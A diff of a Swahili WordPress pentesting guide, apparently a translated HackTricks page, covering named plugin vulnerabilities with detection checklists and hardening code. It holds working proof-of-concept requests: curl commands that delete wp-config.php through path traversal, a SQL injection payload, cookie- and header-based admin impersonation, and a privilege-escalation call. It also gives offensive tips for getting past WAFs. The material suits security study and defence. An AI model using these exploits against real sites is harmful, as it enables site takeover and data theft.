@ -363,21 +363,21 @@ $this->namespace, '/get/', array(
|
||||
)
|
||||
);
|
||||
```
|
||||
The `permission_callback` ni callback kwa function inayothibitisha ikiwa mtumiaji fulani ameidhinishwa kupiga njia ya API.
|
||||
The `permission_callback` ni callback — function inayokagua kama mtumiaji fulani ameidhinishwa kuita API method.
|
||||
|
||||
**Ikiwa function ya built-in `__return_true` inatumika, itapitisha tu ukaguzi wa ruhusa za mtumiaji.**
|
||||
**Ikiwa function ya built-in `__return_true` itatumiwa, itapuuza ukaguzi wa ruhusa za mtumiaji.**
|
||||
|
||||
- **Ufikiaji wa moja kwa moja wa faili ya php**
|
||||
- **Direct access to the php file**
|
||||
|
||||
Kwa kawaida, Wordpress inatumia PHP na faili ndani ya plugins zinapatikana moja kwa moja kupitia web. Kwa hivyo, endapo plugin itafichua utendaji hatarishi unaoamshwa kwa kuingia tu kwenye faili, utaweza kutumiwa na mtumiaji yeyote.
|
||||
Bila shaka, Wordpress inatumia PHP na faili ndani ya plugins zinapatikana moja kwa moja kutoka kwenye web. Hivyo, ikiwa plugin inafichua functionality yoyote iliyo na udhaifu ambayo inasababisha tu kwa kufikia faili hiyo, itakuwa inaweza kutumiwa na mtumiaji yeyote.
|
||||
|
||||
### Trusted-header REST impersonation (WooCommerce Payments ≤ 5.6.1)
|
||||
|
||||
Baadhi ya plugins hufanya "trusted header" kama njia fupi kwa integrations za ndani au reverse proxies, kisha hutumia header hiyo kuweka muktadha wa mtumiaji wa sasa kwa maombi ya REST. Ikiwa header haifungwi kwa njia ya cryptographic kwa ombi na sehemu ya upstream, mshambuliaji anaweza kuispoof na kufikia njia za REST zilizo na vigezo vya juu kama administrator.
|
||||
Baadhi ya plugins hufanya “trusted header” shortcuts kwa internal integrations au reverse proxies kisha hutumia header hiyo kuweka muktadha wa mtumiaji wa sasa kwa REST requests. Ikiwa header haifungwi kwa njia ya kriptografia kwenye request na component ya upstream, mshambuliaji anaweza kuiga header hiyo (spoof) na kufikia privileged REST routes kama administrator.
|
||||
|
||||
- Athari: kuongezeka kwa ruhusa bila uthibitisho hadi hadhi ya admin kwa kuunda administrator mpya kupitia core users REST route.
|
||||
- Mfano wa header: `X-Wcpay-Platform-Checkout-User: 1` (inamlazimisha user ID 1, kawaida akaunti ya administrator ya kwanza).
|
||||
- Njia iliyoathiriwa: `POST /wp-json/wp/v2/users` with an elevated role array.
|
||||
- Athari: kupanuka kwa ruhusa bila uthibitisho hadi admin kwa kuunda administrator mpya kupitia core users REST route.
|
||||
- Example header: `X-Wcpay-Platform-Checkout-User: 1` (inalazimisha user ID 1, kwa kawaida akaunti ya kwanza ya administrator).
|
||||
- Exploited route: `POST /wp-json/wp/v2/users` with an elevated role array.
|
||||
|
||||
PoC
|
||||
```http
|
||||
@ -393,38 +393,38 @@ Content-Length: 114
|
||||
```
|
||||
Kwa nini inafanya kazi
|
||||
|
||||
- Plugin inachanganya header inayoendeshwa na mteja na hali ya authentication na kuruka ukaguzi wa uwezo.
|
||||
- Core ya WordPress inatarajia uwezo wa `create_users` kwa route hii; hack ya plugin inaukwepa kwa kuweka moja kwa moja muktadha wa mtumiaji wa sasa kutoka kwa header.
|
||||
- Plugin inafananisha header inayodhibitiwa na mteja na hali ya uthibitisho na inaruka ukaguzi wa capability.
|
||||
- WordPress core inatarajia uwezo wa `create_users` kwa route hii; plugin hack inaukwepa kwa kuweka moja kwa moja muktadha wa current user kutoka kwa header.
|
||||
|
||||
Viashiria vinavyotarajiwa vya mafanikio
|
||||
Vionyeshi vya mafanikio vinavyotarajiwa
|
||||
|
||||
- HTTP 201 na JSON body inayoelezea mtumiaji aliyeundwa.
|
||||
- Mtumiaji mpya wa admin anaonekana katika `wp-admin/users.php`.
|
||||
- HTTP 201 na JSON body inayobainisha user iliyoundwa.
|
||||
- Admin user mpya inaonekana katika `wp-admin/users.php`.
|
||||
|
||||
Orodha ya kugundua
|
||||
|
||||
- Tafuta kwa grep `getallheaders()`, `$_SERVER['HTTP_...']`, au vendor SDKs zinazosoma custom headers kuweka muktadha wa mtumiaji (mfano, `wp_set_current_user()`, `wp_set_auth_cookie()`).
|
||||
- Kagua REST registrations kwa callbacks zenye vipaumbele ambazo hazina ukaguzi imara wa `permission_callback` na badala yake zinategemea request headers.
|
||||
- Tafuta matumizi ya kazi za usimamizi wa watumiaji za core (`wp_insert_user`, `wp_create_user`) ndani ya REST handlers ambazo zimefungwa kwa thamani za header pekee.
|
||||
- Grep kwa ajili ya `getallheaders()`, `$_SERVER['HTTP_...']`, au vendor SDKs zinazosomea custom headers ili kuweka muktadha wa mtumiaji (mfano, `wp_set_current_user()`, `wp_set_auth_cookie()`).
|
||||
- Pitia REST registrations kwa callbacks zenye privileged actions ambazo hazina ukaguzi thabiti wa `permission_callback` na badala yake zinategemea request headers.
|
||||
- Angalia matumizi ya core user-management functions (`wp_insert_user`, `wp_create_user`) ndani ya REST handlers ambazo zinazuia tu kwa thamani za header.
|
||||
|
||||
Kukaza usalama
|
||||
Kuimarisha usalama
|
||||
|
||||
- Usiweke au kutegemea authentication au authorization kutoka kwa headers zinazodhibitiwa na mteja.
|
||||
- Ikiwa reverse proxy lazima iingize identity, maliza uaminifu kwenye proxy na ondoa nakala za kuingia (mfano, `unset X-Wcpay-Platform-Checkout-User` at the edge), kisha pitia token iliyosainiwa na uthibitishe upande wa server.
|
||||
- Kwa routes za REST zinazofanya vitendo vya vipaumbele, liwa ukaguzi wa `current_user_can()` na `permission_callback` kali (USITUMIE `__return_true`).
|
||||
- Pendelea auth ya first-party (cookies, application passwords, OAuth) badala ya header “impersonation”.
|
||||
- Usipatikane uthibitisho au idhini kutoka kwa headers zinazodhibitiwa na mteja.
|
||||
- Ikiwa reverse proxy inapaswa kuingiza identity, ifunge trust kwenye proxy na futa nakala za inbound (mfano, `unset X-Wcpay-Platform-Checkout-User` kwenye edge), kisha pita token iliyosainiwa na uiweke wazi server-side.
|
||||
- Kwa REST routes zinazofanya vitendo vya privileged, sitauli ukaguzi wa `current_user_can()` na tumia `permission_callback` kali (USITUMIE `__return_true`).
|
||||
- Tumia uthibitisho wa first-party (cookies, application passwords, OAuth) badala ya “impersonation” kupitia header.
|
||||
|
||||
References: angalia viungo mwishoni mwa ukurasa huu kwa kesi ya umma na uchambuzi mpana.
|
||||
References: ona viungo mwishoni mwa ukurasa huu kwa kesi ya umma na uchambuzi mpana.
|
||||
|
||||
### Ufutaji wa Faili kwa Hiari Bila Uthibitisho kupitia wp_ajax_nopriv (Litho Theme <= 3.0)
|
||||
### Unauthenticated Arbitrary File Deletion via wp_ajax_nopriv (Litho Theme <= 3.0)
|
||||
|
||||
Themes na plugins za WordPress mara nyingi huweka wazi handlers za AJAX kupitia hooks `wp_ajax_` na `wp_ajax_nopriv_`. Wakati toleo la **_nopriv_** linapotumika **callback inafikiwa na wageni wasio na uthibitisho**, hivyo kitendo chochote nyeti kinapaswa kutekeleza pia:
|
||||
WordPress themes and plugins frequently expose AJAX handlers through the `wp_ajax_` and `wp_ajax_nopriv_` hooks. When the **_nopriv_** variant is used **the callback becomes reachable by unauthenticated visitors**, so any sensitive action must additionally implement:
|
||||
|
||||
1. Ukaguzi wa uwezo (**capability check**) (mfano `current_user_can()` au angalau `is_user_logged_in()`), na
|
||||
2. Nonce ya **CSRF** iliyothibitishwa kwa `check_ajax_referer()` / `wp_verify_nonce()`, na
|
||||
3. **Usafishaji / uthibitisho mkali wa ingizo**.
|
||||
1. A **capability check** (e.g. `current_user_can()` or at least `is_user_logged_in()`), and
|
||||
2. A **CSRF nonce** validated with `check_ajax_referer()` / `wp_verify_nonce()`, and
|
||||
3. **Strict input sanitisation / validation**.
|
||||
|
||||
Theme ya Litho multipurpose (< 3.1) ilisahau udhibiti hizo 3 katika kipengele cha *Remove Font Family* na hatimaye ikaweka msimbo ufuatao (uliosahihishwa):
|
||||
The Litho multipurpose theme (< 3.1) forgot those 3 controls in the *Remove Font Family* feature and ended up shipping the following code (simplified):
|
||||
```php
|
||||
function litho_remove_font_family_action_data() {
|
||||
if ( empty( $_POST['fontfamily'] ) ) {
|
||||
@ -443,31 +443,31 @@ die();
|
||||
add_action( 'wp_ajax_litho_remove_font_family_action_data', 'litho_remove_font_family_action_data' );
|
||||
add_action( 'wp_ajax_nopriv_litho_remove_font_family_action_data', 'litho_remove_font_family_action_data' );
|
||||
```
|
||||
Issues introduced by this snippet:
|
||||
Masuala yaliyotolewa na kipande hiki cha msimbo:
|
||||
|
||||
* **Unauthenticated access** – hook ya `wp_ajax_nopriv_` imesajiliwa.
|
||||
* **No nonce / capability check** – mtembeleaji yeyote anaweza kufikia endpoint.
|
||||
* **No path sanitisation** – mnyororo wa `fontfamily` unaodhibitiwa na mtumiaji umeunganishwa kwenye path ya filesystem bila kuchuja, kuruhusu classic `../../` traversal.
|
||||
* **Unauthenticated access** – hook ya `wp_ajax_nopriv_` imeandikishwa.
|
||||
* **No nonce / capability check** – mgeni yeyote anaweza kufikia endpoint.
|
||||
* **No path sanitisation** – kamba ya `fontfamily` inayodhibitiwa na mtumiaji inaunganishwa na njia ya filesystem bila kuchujwa, ikiruhusu traversal ya kawaida ya `../../`.
|
||||
|
||||
#### Exploitation
|
||||
#### Uvamizi
|
||||
|
||||
Mshambulizi anaweza kufuta faili au saraka yoyote **chini ya uploads base directory** (kwa kawaida `<wp-root>/wp-content/uploads/`) kwa kutuma ombi moja la HTTP POST:
|
||||
Mshambuliaji anaweza kufuta faili au saraka yoyote **chini ya saraka ya msingi ya uploads** (kawaida `<wp-root>/wp-content/uploads/`) kwa kutuma ombi moja la HTTP POST:
|
||||
```bash
|
||||
curl -X POST https://victim.com/wp-admin/admin-ajax.php \
|
||||
-d 'action=litho_remove_font_family_action_data' \
|
||||
-d 'fontfamily=../../../../wp-config.php'
|
||||
```
|
||||
Kwa sababu `wp-config.php` iko nje ya *uploads*, mfululizo wa `../` mara nne unatosha katika usakinishaji wa chaguo-msingi. Kufuta `wp-config.php` kunalazimisha WordPress kuingia kwenye *installation wizard* katika ziara inayofuata, kuiruhusu takeover kamili ya tovuti (mshambuliaji anatoa tu usanidi mpya wa DB na kuunda mtumiaji wa admin).
|
||||
Kwa sababu `wp-config.php` iko nje ya *uploads*, mfululizo wa `../` mara nne unatosha kwenye installation chaguomsingi. Kufuta `wp-config.php` kunalazimisha WordPress kuingia kwenye *mwongozo wa ufungaji* kwenye ziara inayofuata, na kuwezesha kuchukua udhibiti wa tovuti nzima (mshambuliaji anatoa tu usanidi mpya wa DB na kuunda admin user).
|
||||
|
||||
Malengo mengine yenye athari ni pamoja na faili za plugin/theme `.php` (kwa kuvunja plugin za usalama) au sheria za `.htaccess`.
|
||||
Malengo mengine yenye athari ni plugin/theme `.php` files (kuharibu security plugins) au sheria za `.htaccess`.
|
||||
|
||||
#### Orodha ya utambuzi
|
||||
#### Orodha ya ugunduzi
|
||||
|
||||
* Kila callback ya `add_action( 'wp_ajax_nopriv_...')` inayoitisha helper za filesystem (`copy()`, `unlink()`, `$wp_filesystem->delete()`, n.k.).
|
||||
* Ujunganishaji wa input za mtumiaji zisizochujwa ndani ya paths (angalia `$_POST`, `$_GET`, `$_REQUEST`).
|
||||
* Iwapo callback yoyote ya `add_action( 'wp_ajax_nopriv_...')` inaita filesystem helpers (`copy()`, `unlink()`, `$wp_filesystem->delete()`, n.k.).
|
||||
* Kuunganisha ingizo la mtumiaji lisilosafishwa ndani ya njia za faili (angalia `$_POST`, `$_GET`, `$_REQUEST`).
|
||||
* Kukosekana kwa `check_ajax_referer()` na `current_user_can()`/`is_user_logged_in()`.
|
||||
|
||||
#### Kuimarisha usalama
|
||||
#### Kuimarisha
|
||||
```php
|
||||
function secure_remove_font_family() {
|
||||
if ( ! is_user_logged_in() ) {
|
||||
@ -487,16 +487,16 @@ add_action( 'wp_ajax_litho_remove_font_family_action_data', 'secure_remove_font_
|
||||
// 🔒 NO wp_ajax_nopriv_ registration
|
||||
```
|
||||
> [!TIP]
|
||||
> **Daima** chukulia kila operesheni ya kuandika/kufuta kwenye disk kama yenye cheo kikubwa na hakikisha mara mbili:
|
||||
> **Kila wakati** chukulia operesheni yoyote ya kuandika/kufuta kwenye disk kuwa yenye hadhi ya juu na hakikisha tena:
|
||||
> • Authentication • Authorisation • Nonce • Input sanitisation • Path containment (e.g. via `realpath()` plus `str_starts_with()`).
|
||||
|
||||
---
|
||||
|
||||
### Privilege escalation via stale role restoration and missing authorization (ASE "View Admin as Role")
|
||||
### Privilege escalation kupitia urejeshaji wa stale role na missing authorization (ASE "View Admin as Role")
|
||||
|
||||
Plugin nyingi hutekeleza kipengele cha "view as role" au temporary role-switching kwa kuhifadhi role(s) za awali katika user meta ili ziweze kurejeshwa baadaye. Ikiwa njia ya urejeshaji inategemea tu request parameters (mfano, `$_REQUEST['reset-for']`) na orodha inayohifadhiwa na plugin bila kukagua capabilities na nonce halali, hii inakuwa vertical privilege escalation.
|
||||
Plugins nyingi zinaweka kipengele cha "view as role" au kubadilisha role kwa muda kwa kuhifadhi role(s) asilia katika user meta ili ziweze kurejeshwa baadaye. Ikiwa njia ya urejesho inategemea tu request parameters (mfano, `$_REQUEST['reset-for']`) na orodha inayotunzwa na plugin bila kuangalia capabilities na valid nonce, hili linakuwa vertical privilege escalation.
|
||||
|
||||
Mfano halisi ulipatikana kwenye Admin and Site Enhancements (ASE) plugin (≤ 7.6.2.1). Tawi la reset liliirejesha roles kulingana na `reset-for=<username>` ikiwa username ilionekana katika array ya ndani `$options['viewing_admin_as_role_are']`, lakini halikufanya `current_user_can()` check wala nonce verification kabla ya kuondoa current roles na kuongeza tena roles zilizohifadhiwa kutoka user meta `_asenha_view_admin_as_original_roles`:
|
||||
Mfano wa ulimwengu halisi ulipatikana katika Admin and Site Enhancements (ASE) plugin (≤ 7.6.2.1). Reset branch ilirejesha roles kulingana na `reset-for=<username>` ikiwa jina la mtumiaji lilionekana katika array ya ndani `$options['viewing_admin_as_role_are']`, lakini haikufanya either check ya `current_user_can()` wala verification ya nonce kabla ya kuondoa current roles na kuirudia kuingiza roles zilizohifadhiwa kutoka user meta `_asenha_view_admin_as_original_roles`:
|
||||
```php
|
||||
// Simplified vulnerable pattern
|
||||
if ( isset( $_REQUEST['reset-for'] ) ) {
|
||||
@ -513,17 +513,17 @@ foreach ( $orig as $r ) { $u->add_role( $r ); }
|
||||
```
|
||||
Kwa nini inaweza kutumiwa
|
||||
|
||||
- Inamwamini `$_REQUEST['reset-for']` na chaguo la plugin bila idhinisho upande wa server.
|
||||
- Ikiwa mtumiaji aliwahi kuwa na vibali vya juu vilivyohifadhiwa katika `_asenha_view_admin_as_original_roles` na baadaye alipunguzwa, anaweza kuviweka tena kwa kufikia njia ya reset.
|
||||
- Katika deployments zingine, mtumiaji yeyote aliye authenticated anaweza kusababisha reset kwa username mwingine aliyeko bado katika `viewing_admin_as_role_are` (idhinishaji lililoharibika).
|
||||
- Inaamini `$_REQUEST['reset-for']` na chaguo la plugin bila idhini upande wa seva.
|
||||
- Ikiwa mtumiaji hapo awali alikuwa na ruhusa za juu zilizohifadhiwa katika `_asenha_view_admin_as_original_roles` na alipopunguzwa, anaweza kuzirejesha kwa kutembelea njia ya kuweka upya.
|
||||
- Katika baadhi ya utolewaji, mtumiaji yeyote aliyethibitishwa anaweza kusababisha kuweka upya kwa jina la mtumiaji mwingine ambalo bado lipo katika `viewing_admin_as_role_are` (idhinishaji limevunjika).
|
||||
|
||||
Mahitaji ya shambulio
|
||||
Masharti ya shambulio
|
||||
|
||||
- Toleo la plugin lenye udhaifu na kipengele kimewezeshwa.
|
||||
- Akaunti lengwa ina jukumu la juu lililosalia lililohifadhiwa katika user meta kutoka matumizi ya awali.
|
||||
- Kikao chochote cha authenticated; ukosefu wa nonce/capability katika mtiririko wa reset.
|
||||
- Akaunti lengwa ina jukumu la juu lisilotumika lililohifadhiwa katika user meta kutokana na matumizi ya awali.
|
||||
- Kikao chochote kilichothibitishwa; hakuna nonce/capability katika mtiririko wa reset.
|
||||
|
||||
Exploitation (example)
|
||||
Utekelezaji (mfano)
|
||||
```bash
|
||||
# While logged in as the downgraded user (or any auth user able to trigger the code path),
|
||||
# hit any route that executes the role-switcher logic and include the reset parameter.
|
||||
@ -531,75 +531,125 @@ Exploitation (example)
|
||||
curl -s -k -b 'wordpress_logged_in=...' \
|
||||
'https://victim.example/wp-admin/?reset-for=<your_username>'
|
||||
```
|
||||
Katika builds zilizo hatarini hii hufuta current roles na kuziweka tena original roles zilizohifadhiwa (mfano, `administrator`), kwa ufanisi kuongeza privileges.
|
||||
Kwenye builds zilizo hatarini hili hufuta roles za sasa na kurejesha roles za awali zilizohifadhiwa (mfano, `administrator`), kwa ufanisi ikiongeza mamlaka.
|
||||
|
||||
Detection checklist
|
||||
|
||||
- Tafuta vipengele vya role-switching vinavyohifadhi “original roles” katika user meta (mfano, `_asenha_view_admin_as_original_roles`).
|
||||
- Tambua reset/restore paths ambazo:
|
||||
- Tafuta vipengele vya kubadili roles vinavyohifadhi “original roles” katika user meta (mfano, `_asenha_view_admin_as_original_roles`).
|
||||
- Tambua njia za reset/restore ambazo:
|
||||
- Soma majina ya watumiaji kutoka `$_REQUEST` / `$_GET` / `$_POST`.
|
||||
- Badilisha roles kupitia `add_role()` / `remove_role()` bila `current_user_can()` na `wp_verify_nonce()` / `check_admin_referer()`.
|
||||
- Ruhusu kwa msingi wa plugin option array (mfano, `viewing_admin_as_role_are`) badala ya capabilities za actor.
|
||||
- Ruhusu kwa kuzingatia array ya chaguo la plugin (mfano, `viewing_admin_as_role_are`) badala ya uwezo wa mhusika.
|
||||
|
||||
Hardening
|
||||
|
||||
- Lazimisha ukaguzi wa capabilities katika kila tawi linalobadilisha state (mfano, `current_user_can('manage_options')` au kali zaidi).
|
||||
- Hitaji nonces kwa mabadiliko yote ya role/permission na zithibitishe: `check_admin_referer()` / `wp_verify_nonce()`.
|
||||
- Usiwamini kamwe majina ya watumiaji yaliyotolewa ndani ya request; tambua mtumiaji lengwa upande wa server kulingana na mhusika aliyethibitishwa na sera wazi.
|
||||
- Ghairi uhalali wa hali ya “original roles” wakati wa masasisho ya profile/role ili kuepuka urejeshaji wa kibali cha juu kilichochakaa:
|
||||
- Tekeleza ukaguzi wa uwezo kwenye kila tawi linalobadilisha hali (mfano, `current_user_can('manage_options')` au ngumu zaidi).
|
||||
- Lazimisha nonces kwa mabadiliko yote ya role/idhini na uyathibitishe: `check_admin_referer()` / `wp_verify_nonce()`.
|
||||
- Usiwamini kamwe majina ya watumiaji yanayotolewa na request; tafuta mtumiaji lengwa upande wa server kulingana na mwendeshaji aliye thibitishwa na sera wazi.
|
||||
- Futa hali ya “original roles” kwenye masasisho ya wasifu/role ili kuepuka kurejeshwa kwa ruhusa za juu zilizokuwa za zamani:
|
||||
```php
|
||||
add_action( 'profile_update', function( $user_id ) {
|
||||
delete_user_meta( $user_id, '_asenha_view_admin_as_original_roles' );
|
||||
}, 10, 1 );
|
||||
```
|
||||
- Fikiria kuhifadhi state ndogo tu na kutumia token za muda mfupi, zilizo na ulinzi wa capabilities, kwa kubadilisha majukumu kwa muda.
|
||||
- Fikiria kuhifadhi hali ndogo tu na kutumia tokens zenye muda wa uhalali, zilizo na ulinzi wa capability kwa ajili ya kubadilisha role kwa muda.
|
||||
|
||||
---
|
||||
|
||||
### WAF considerations for WordPress/plugin CVEs
|
||||
### Kuongezeka kwa mamlaka bila uthibitisho kupitia cookie‑trusted user switching kwenye public `init` (Service Finder “sf-booking”)
|
||||
|
||||
Generic edge/server WAFs zimeundwa kwa mifumo ya jumla (SQLi, XSS, LFI). Mengi ya dosari za WordPress/plugin zenye athari kubwa ni bugi za mantiki maalum ya application/uthibitisho (auth) ambazo zinaonekana kama trafiki ya kawaida isipokuwa engine itaelewa routes za WordPress na semantics za plugin.
|
||||
Plugins fulani huunganisha user-switching helpers kwenye public `init` hook na huchota utambulisho kutoka kwa cookie inayodhibitiwa na mteja. Ikiwa code inaita `wp_set_auth_cookie()` bila kuthibitisha authentication, capability na nonce halali, mgeni yeyote asiyethibitishwa anaweza kulazimisha kuingia kama user ID yoyote.
|
||||
|
||||
Mfano wa kawaida wenye hatari (umerahisishwa kutoka Service Finder Bookings ≤ 6.1):
|
||||
```php
|
||||
function service_finder_submit_user_form(){
|
||||
if ( isset($_GET['switch_user']) && is_numeric($_GET['switch_user']) ) {
|
||||
$user_id = intval( sanitize_text_field($_GET['switch_user']) );
|
||||
service_finder_switch_user($user_id);
|
||||
}
|
||||
if ( isset($_GET['switch_back']) ) {
|
||||
service_finder_switch_back();
|
||||
}
|
||||
}
|
||||
add_action('init', 'service_finder_submit_user_form');
|
||||
|
||||
function service_finder_switch_back() {
|
||||
if ( isset($_COOKIE['original_user_id']) ) {
|
||||
$uid = intval($_COOKIE['original_user_id']);
|
||||
if ( get_userdata($uid) ) {
|
||||
wp_set_current_user($uid);
|
||||
wp_set_auth_cookie($uid); // 🔥 sets auth for attacker-chosen UID
|
||||
do_action('wp_login', get_userdata($uid)->user_login, get_userdata($uid));
|
||||
setcookie('original_user_id', '', time() - 3600, '/');
|
||||
wp_redirect( admin_url('admin.php?page=candidates') );
|
||||
exit;
|
||||
}
|
||||
wp_die('Original user not found.');
|
||||
}
|
||||
wp_die('No original user found to switch back to.');
|
||||
}
|
||||
```
|
||||
Kwa nini inaweza kutumika
|
||||
|
||||
- Hook ya umma ya `init` inafanya mshughulikiaji kupatikana kwa watumiaji wasiothibitishwa (hakuna `is_user_logged_in()` guard).
|
||||
- Utambulisho umetokana na cookie inayoweza kubadilishwa na mteja (`original_user_id`).
|
||||
- Kiito cha moja kwa moja cha `wp_set_auth_cookie($uid)` kinaingia muombaji kama mtumiaji huyo bila ukaguzi wowote wa capability/nonce.
|
||||
|
||||
Utekelezaji (bila kuidhinishwa)
|
||||
```http
|
||||
GET /?switch_back=1 HTTP/1.1
|
||||
Host: victim.example
|
||||
Cookie: original_user_id=1
|
||||
User-Agent: PoC
|
||||
Connection: close
|
||||
```
|
||||
---
|
||||
|
||||
### Mambo ya kuzingatia ya WAF kwa WordPress/plugin CVEs
|
||||
|
||||
WAF za generic za edge/server zimepangwa kwa mifumo pana (SQLi, XSS, LFI). Mapungufu mengi yenye athari kubwa katika WordPress/plugin ni mende za logic/auth maalum za programu ambazo huonekana kama trafiki isiyo hatari isipokuwa engine itakapoelewa routes za WordPress na semantics za plugin.
|
||||
|
||||
Offensive notes
|
||||
|
||||
- Lenga endpoints maalum za plugin kwa payloads safi: `admin-ajax.php?action=...`, `wp-json/<namespace>/<route>`, custom file handlers, shortcodes.
|
||||
- Jaribu njia zisizothibitishwa kwanza (AJAX `nopriv`, REST na permissive `permission_callback`, shortcodes za umma). Payloads za default mara nyingi zinafanikiwa bila obfuscation.
|
||||
- Mifano ya kawaida zenye athari kubwa: privilege escalation (broken access control), arbitrary file upload/download, LFI, open redirect.
|
||||
- Fanya kwanza njia zisizo na uthibitisho (AJAX `nopriv`, REST with permissive `permission_callback`, public shortcodes). Default payloads mara nyingi hufanikiwa bila obfuscation.
|
||||
- Mifano ya kawaida yenye athari kubwa: privilege escalation (broken access control), arbitrary file upload/download, LFI, open redirect.
|
||||
|
||||
Defensive notes
|
||||
|
||||
- Usitegemee saini za generic za WAF kulinda plugin CVEs. Tekeleza virtual patches maalum kwa layer ya application na aina ya udhaifu au sasisha haraka.
|
||||
- Pendelea positive-security checks katika code (capabilities, nonces, strict input validation) badala ya vichujio hasi vya regex.
|
||||
- Usitegemee saini za generic za WAF kulinda plugin CVEs. Tekeleza virtual patches maalum kwenye application-layer au sasisha haraka.
|
||||
- Tumia positive-security checks katika code (capabilities, nonces, strict input validation) badala ya negative regex filters.
|
||||
|
||||
## Ulinzi wa WordPress
|
||||
|
||||
### Sasisho za kawaida
|
||||
|
||||
Hakikisha WordPress, plugins, na themes ziko kwenye matoleo ya hivi karibuni. Pia thibitisha kwamba automated updating imewezeshwa katika wp-config.php:
|
||||
Hakikisha WordPress, plugins, na themes zimeboreshwa hadi toleo jipya. Pia thibitisha kuwa automated updating imewezeshwa katika wp-config.php:
|
||||
```bash
|
||||
define( 'WP_AUTO_UPDATE_CORE', true );
|
||||
add_filter( 'auto_update_plugin', '__return_true' );
|
||||
add_filter( 'auto_update_theme', '__return_true' );
|
||||
```
|
||||
Pia, **weka tu viendelezi na mandhari za WordPress vinavyoweza kuaminika**.
|
||||
Pia, **weka tu plugins na themes za WordPress za kuaminika**.
|
||||
|
||||
### Viendelezi vya Usalama
|
||||
### Plugins za Usalama
|
||||
|
||||
- [**Wordfence Security**](https://wordpress.org/plugins/wordfence/)
|
||||
- [**Sucuri Security**](https://wordpress.org/plugins/sucuri-scanner/)
|
||||
- [**iThemes Security**](https://wordpress.org/plugins/better-wp-security/)
|
||||
|
||||
### **Mapendekezo Mengine**
|
||||
### **Mapendekezo mengine**
|
||||
|
||||
- Ondoa mtumiaji wa chaguo-msingi **admin**
|
||||
- Tumia **nywila zenye nguvu** na **2FA**
|
||||
- Kwa vipindi vya kawaida **kagua** **ruhusa** za watumiaji
|
||||
- **Punguza majaribio ya kuingia** ili kuzuia mashambulizi ya Brute Force
|
||||
- Badilisha jina la faili **`wp-admin.php`** na ruhusu ufikaji tu ndani ya mtandao au kutoka anwani za IP fulani.
|
||||
- Mara kwa mara **kagua** ruhusa za watumiaji
|
||||
- **Punguza idadi ya jaribio la kuingia** ili kuzuia mashambulizi ya Brute Force
|
||||
- Badilisha jina la faili **`wp-admin.php`** na ruhusu ufikiaji ndani tu au kutoka kwa anwani za IP maalum.
|
||||
|
||||
### SQL Injection isiyothibitishwa kutokana na uhakiki usiofaa (WP Job Portal <= 2.3.2)
|
||||
|
||||
Plugin ya ajira WP Job Portal ilifunua kazi ya **savecategory** ambayo hatimaye inatekeleza msimbo ufuatao wenye udhaifu ndani ya `modules/category/model.php::validateFormData()`:
|
||||
### SQL Injection bila uthibitisho kupitia uhakiki usio wa kutosha (WP Job Portal <= 2.3.2)
|
||||
|
||||
Plugin ya uajiri ya WP Job Portal ilifunua kazi ya **savecategory** ambayo hatimaye inatekeleza msimbo wenye udhaifu ufuatao ndani ya `modules/category/model.php::validateFormData()`:
|
||||
```php
|
||||
$category = WPJOBPORTALrequest::getVar('parentid');
|
||||
$inquery = ' ';
|
||||
@ -609,19 +659,19 @@ $inquery .= " WHERE parentid = $category "; // <-- direct concat ✗
|
||||
$query = "SELECT max(ordering)+1 AS maxordering FROM "
|
||||
. wpjobportal::$_db->prefix . "wj_portal_categories " . $inquery; // executed later
|
||||
```
|
||||
Masuala yaliyoletwa na kipande hiki cha msimbo:
|
||||
Masuala yaliyoletwa na kipande hiki:
|
||||
|
||||
1. **Kuingizwa kwa mtumiaji bila kusafishwa** – `parentid` inatoka moja kwa moja kutoka kwenye ombi la HTTP.
|
||||
2. **Uchanganyaji wa kamba ndani ya klauzi ya WHERE** – hakuna `is_numeric()` / `esc_sql()` / prepared statement.
|
||||
3. **Ufikika bila uthibitisho** – ingawa kitendo kinaendeshwa kupitia `admin-post.php`, ukaguzi pekee uliopo ni **CSRF nonce** (`wp_verify_nonce()`), ambao mgeni yeyote anaweza kupata kutoka kwenye ukurasa wa umma unaojumuisha shortcode `[wpjobportal_my_resumes]`.
|
||||
1. **Ingizo la mtumiaji lisilosafishwa** – `parentid` linatokana moja kwa moja na ombi la HTTP.
|
||||
2. **Ujunganishaji wa string ndani ya WHERE clause** – hakuna matumizi ya `is_numeric()` / `esc_sql()` au prepared statement.
|
||||
3. **Upatikanaji bila uthibitisho** – ingawa kitendo kinatekelezwa kupitia `admin-post.php`, ukaguzi pekee uliopo ni **CSRF nonce** (`wp_verify_nonce()`), ambao mtembeleaji yeyote anaweza kuupata kutoka kwenye ukurasa wa umma unaojumuisha shortcode `[wpjobportal_my_resumes]`.
|
||||
|
||||
#### Exploitation
|
||||
#### Utekelezwaji
|
||||
|
||||
1. Pata nonce mpya:
|
||||
```bash
|
||||
curl -s https://victim.com/my-resumes/ | grep -oE 'name="_wpnonce" value="[a-f0-9]+' | cut -d'"' -f4
|
||||
```
|
||||
2. Inject arbitrary SQL by abusing `parentid`:
|
||||
2. Ingiza SQL ya hiari kwa kuutumia vibaya `parentid`:
|
||||
```bash
|
||||
curl -X POST https://victim.com/wp-admin/admin-post.php \
|
||||
-d 'task=savecategory' \
|
||||
@ -629,20 +679,20 @@ curl -X POST https://victim.com/wp-admin/admin-post.php \
|
||||
-d 'parentid=0 OR 1=1-- -' \
|
||||
-d 'cat_title=pwn' -d 'id='
|
||||
```
|
||||
Jibu linaonyesha matokeo ya query iliyoungizwa au linabadilisha database, kuthibitisha SQLi.
|
||||
Majibu yanafunua matokeo ya query iliyowekwa au yanabadilisha database, kuthibitisha SQLi.
|
||||
|
||||
|
||||
### Unauthenticated Arbitrary File Download / Path Traversal (WP Job Portal <= 2.3.2)
|
||||
|
||||
Kazi nyingine, **downloadcustomfile**, iliruhusu wageni kupakua **faili yoyote kwenye diski** kupitia path traversal. Sink iliyo dhaifu iko katika `modules/customfield/model.php::downloadCustomUploadedFile()`:
|
||||
Kazi nyingine, **downloadcustomfile**, iliwaruhusu wageni kupakua **faili yoyote kwenye diski** kwa kupitia path traversal. Sink iliyo hatarishi iko katika `modules/customfield/model.php::downloadCustomUploadedFile()`:
|
||||
```php
|
||||
$file = $path . '/' . $file_name;
|
||||
...
|
||||
echo $wp_filesystem->get_contents($file); // raw file output
|
||||
```
|
||||
`$file_name` inadhibitiwa na mshambuliaji na imeunganishwa **bila kusafishwa**. Tena, kizuizi pekee ni **CSRF nonce** ambacho kinaweza kupatikana kutoka kwenye ukurasa wa resume.
|
||||
